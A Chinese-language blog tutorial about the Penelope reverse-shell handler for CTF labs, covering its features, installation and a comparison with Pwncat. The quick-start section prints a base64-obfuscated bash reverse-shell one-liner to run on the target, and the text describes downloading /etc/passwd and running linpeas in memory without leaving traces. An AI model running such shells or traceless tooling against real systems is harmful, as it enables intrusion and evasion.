打靶机爱好者必备的神器：Penelope Shell Handler

在渗透测试和CTF打靶机的世界中，获取并管理远程 shell 是每个安全研究者或爱好者必备的技能。传统的工具如 netcat（简称 nc）虽然简单易用，但在功能性和交互性上存在局限性。为了弥补这些不足，许多现代工具应运而生，而今天我们要深入探讨的，便是 GitHub 上由 brightio 开发的开源项目——Penelope Shell Handler（以下简称 Penelope）。

本文将详细介绍 Penelope 的功能、使用场景、安装方法以及它如何提升你的渗透测试体验。

一、Penelope 是什么？

Penelope 是一个高级 shell 处理工具，旨在取代传统的 netcat，为利用远程代码执行（RCE）漏洞时提供更强大的功能。它由 Python 3 编写，适用于 Linux 和 macOS 系统，最重要的是，它是一个单文件脚本，无需安装第三方依赖即可运行。这种设计理念让它在便携性和易用性上极具优势，尤其适合需要在不同环境中快速部署的打靶机玩家。

Penelope 的命名灵感来源于希腊神话中奥德修斯的妻子佩涅洛佩（Penelope），她以忠诚和耐心等待丈夫归来而闻名。同样地，作为一个反向 shell 处理工具，Penelope 的核心特性之一就是“等待”——等待目标机器发起连接，并在此基础上提供丰富的功能来管理这些连接。

在功能上，Penelope 不仅能捕获反向 shell，还能自动将其升级为全交互式的 PTY（伪终端），支持实时调整终端大小、记录与目标的交互、上传/下载文件，甚至运行脚本并获取实时输出。这些特性让它在打靶机时成为一个不可或缺的利器，尤其是在需要持久化访问或执行复杂操作的场景中。

二、为什么选择 Penelope？

在打靶机时，获取 shell 只是第一步，如何高效地利用这个 shell 才是关键。传统的 netcat 虽然简单，但它提供的 shell 通常是非交互式的，缺乏诸如 Ctrl+C 的正常处理能力，也无法轻松实现文件传输或脚本执行。而 Penelope 的出现，恰好解决了这些痛点。以下是它相较于其他工具的几个核心优势：

1. 自动升级为全交互式 PTY

一旦捕获反向 Shell，Penelope 会自动将其升级为全交互式伪终端（PTY）。这意味着，你可以像操作本地终端一样，流畅运行 top、nano、vim 等需要终端支持的命令，无需手动执行繁琐的升级脚本（如 python -c 'import pty;pty.spawn("/bin/bash")'）。相比之下，Pwncat 虽然也支持 PTY 升级，但需要用户手动配置或依赖其内置模块，操作稍显复杂，尤其对新手不够友好。Penelope 的自动化设计，让你在靶场中专注于探索而非技术细节。

2. 强大的交互管理与多任务支持

Penelope 内置直观的主菜单界面，只需按下 F12，即可进入。你可以暂时脱离当前 Shell 会话，执行文件上传、下载或脚本运行等操作，而与目标的连接始终保持稳定。它还提供 maintain 备用 Shell 功能，维持多个会话，确保连接断开时仍有后路；通过 spawn 创建新 Shell，动态生成额外会话，灵活应对复杂任务。Pwncat 同样支持多会话管理，但其实现方式更倾向于命令行参数和模块化配置，界面交互性不如 Penelope 直观。对于需要在靶场中快速切换任务的用户，Penelope 的菜单式设计无疑更具优势。

3. 细致的会话日志记录

Penelope 每次与目标的交互都会自动记录到日志文件中，细致保存每一步操作的痕迹。无论是复盘解题思路，还是提取关键输出，这些日志都将成为你的得力助手。Pwncat 虽然也支持日志记录，但默认配置下不够细致，且需要额外设置才能达到类似效果。对于 CTF 玩家或渗透测试者来说，Penelope 的日志功能不仅实用，还能提升专业性，让每一次靶场之旅都有迹可循。

4. 无缝文件传输与脚本执行

Penelope 内置轻量级 HTTP 文件服务器，文件传输操作简单高效。你可以快速将工具或脚本上传到目标，或从目标下载关键文件（如 /etc/passwd 或 flag.txt）。更妙的是，它支持在目标上运行脚本，并将输出实时保存到本地文件，且不会在目标磁盘留下痕迹。Pwncat 同样具备文件传输和脚本执行功能，但其实现依赖于更复杂的协议（如 SSH 或自定义模块），在某些受限环境中可能受阻。Penelope 的轻量设计和无痕操作，使其在靶场效率上更胜一筹。

5. 与 Metasploit 的无缝兼容

对于 Metasploit 用户，Penelope 提供了贴心支持。通过设置 DisablePayloadHandler True，它能与 Metasploit 和谐共存，避免端口冲突。更令人惊叹的是，它还能将普通 Windows Shell 升级为功能强大的 Meterpreter 会话，让你在 Windows 靶机中如鱼得水。Pwncat 虽然也支持与 Metasploit 集成，但其配置过程相对繁琐，且对 Windows 环境的优化不如 Penelope 完善。这使得 Penelope 成为 Metasploit 用户的理想“搭档”。

7. Penelope 相较于 Pwncat 的优势

安装复杂性：Pwncat 的安装需要配置 Python 环境并安装多个依赖库，对于不熟悉 Python 包管理的用户来说，可能会遇到版本冲突或安装失败的问题。而 Penelope 仅需一个文件，无需额外依赖，安装简单，极大降低了入门门槛。
资源占用：Pwncat 功能全面但资源占用较高，尤其在低配环境中可能运行不畅；Penelope 则轻量高效，适合快速部署。
学习曲线：Pwncat 的命令行操作和模块化设计功能强大，但对新手不够友好；Penelope 的菜单式交互和自动化功能则更易上手。
适用场景：Pwncat 更适合需要深度定制和长期持久化的渗透测试场景，而 Penelope 则专注于 CTF 和快速打靶，强调效率和便携性。

通过上述特性整合——自动 PTY 升级、多会话管理、文件传输与脚本执行——Penelope 赋予了用户近乎 C2 框架的操作体验。你可以轻松维持多个备用 Shell，动态创建新会话，甚至像指挥官一样掌控目标系统。相比 Pwncat 的全面性，Penelope 在轻量化、易用性和靶场特化上更胜一筹。它将繁琐操作自动化，将复杂需求简易化，让你在每一次 Shell 交互中得心应手。选择 Penelope，就是选择了一条更高效、更专业的靶场之路。

三、安装与基本使用

安装方法

Penelope 的安装过程极其简单，以下是两种主要方式：

直接下载运行
在终端中输入以下命令即可下载并运行 Penelope：
```
wget https://raw.githubusercontent.com/brightio/penelope/main/penelope.py && python3 penelope.py
```
这将从 GitHub 仓库拉取最新版本的脚本并立即启动。
使用 pipx 安装 （推荐）
如果你希望更规范地管理 Penelope，可以通过 pipx 安装：
```
pipx install git+https://github.com/brightio/penelope
```
安装完成后，直接输入 penelope 即可运行。

基本用法

Penelope 的命令行参数设计灵活且直观，以下是一些常见的用法示例，助你在靶场中快速上手：

监听反向 Shell（默认端口 4444）
```
python3 penelope.py
```
启动后，Penelope 将在 0.0.0.0:4444 上监听，随时捕获目标发起的反向 Shell 连接。
自定义端口监听
```
python3 penelope.py 5555
```
指定端口 5555，在 0.0.0.0:5555 上监听。
指定网络接口监听
```
python3 penelope.py 5555 -i eth0
```
将监听绑定到特定网络接口（如 eth0）的 5555 端口。
连接绑定 Shell
```
python3 penelope.py -c target 3333
```
主动连接目标主机 target 上运行在 3333 端口的绑定 Shell，适用于目标已开放监听的情况。
生成可用 Payload
```
python3 penelope.py -a
```
在监听的同时，显示基于当前监听配置的反向 Shell Payload 示例，方便你在目标机器上直接粘贴执行。

快速上手示例

启动 Penelope
在攻击机上运行：
```
penelope
```
Penelope 开始在 4444 端口监听，等待目标连接。
在靶机输入反弹 Shell 命令
假设靶机支持 bash，在目标上执行：
```
printf KGJhc2ggPiYgL2Rldi90Y3AvMTkyLjE2OC41Ni4xMDAvNDQ0NCAwPiYxKSAm|base64 -d|bash
```
这将发起反向 Shell，连接到你的攻击机。
进入交互式 Shell
连接成功后，Penelope 自动将 Shell 升级为全交互式 PTY。输入 session 1 或 interact 进入到交互式终端。
按 F12 进入功能菜单
在 Shell 中按下 F12，Penelope 会弹出一个直观的主菜单，如下图所示：
文件传输：Upload 与 Download
- 输入 upload，通过内置 HTTP 服务器将本地文件（如提权脚本）上传至靶机。
- 输入 download，从靶机下载文件（如 /etc/passwd）到本地，完成后还提供可点击的链接查看文件。
运行提权脚本
在菜单中输入 run peass_ng，Penelope 会自动上传并在内存中运行提权脚本linpeas.sh，输出结果实时回传并保存到本地文件，助你快速发现提权路径。

有关更多进阶用法，可参考 GitHub 上的演示视频：Penelope GitHub。

四、局限性与注意事项

尽管 Penelope 功能强大，但它并非完美无缺，以下是一些需要注意的地方：

Windows 支持有限
当前版本对 Windows shell 的支持不如 Unix 完善，例如 download 和 upload 命令主要针对 Unix 系统。Windows 用户可能需要依赖 meterpreter 模块。
日志显示问题
当目标运行如 nano 等带有替代缓冲区的命令并异常终止时，日志文件可能会出现乱码（尽管数据仍在）。开发者计划未来过滤这些转义序列。
依赖 Python 3
目标环境需要支持 Python 3.6 或更高版本，否则部分功能可能无法使用。
学习曲线
对于新手来说，主菜单和命令可能需要一些时间适应，但一旦熟悉，效率会显著提升。

总结

对于 CTF 爱好者和渗透测试者来说，Penelope 是一个值得尝试的工具。它不仅弥补了 netcat 的不足，还通过自动化、丰富的功能和极致的便携性提升了 Shell 管理的效率。相较于 Pwncat，Penelope 在安装简单性、使用便捷性和靶场适配性上更具优势，尤其适合追求效率的玩家。无论你是 CTF 新手还是经验丰富的渗透测试者，Penelope 都能为你的靶场之旅增添便利与乐趣。

现在就行动起来吧！访问 https://github.com/brightio/penelope，下载脚本，尝试在你的下一个靶机上使用它。相信我，一旦你体验到它的强大，你会忍不住想把它推荐给身边的每一位安全爱好者。

Happy Hacking!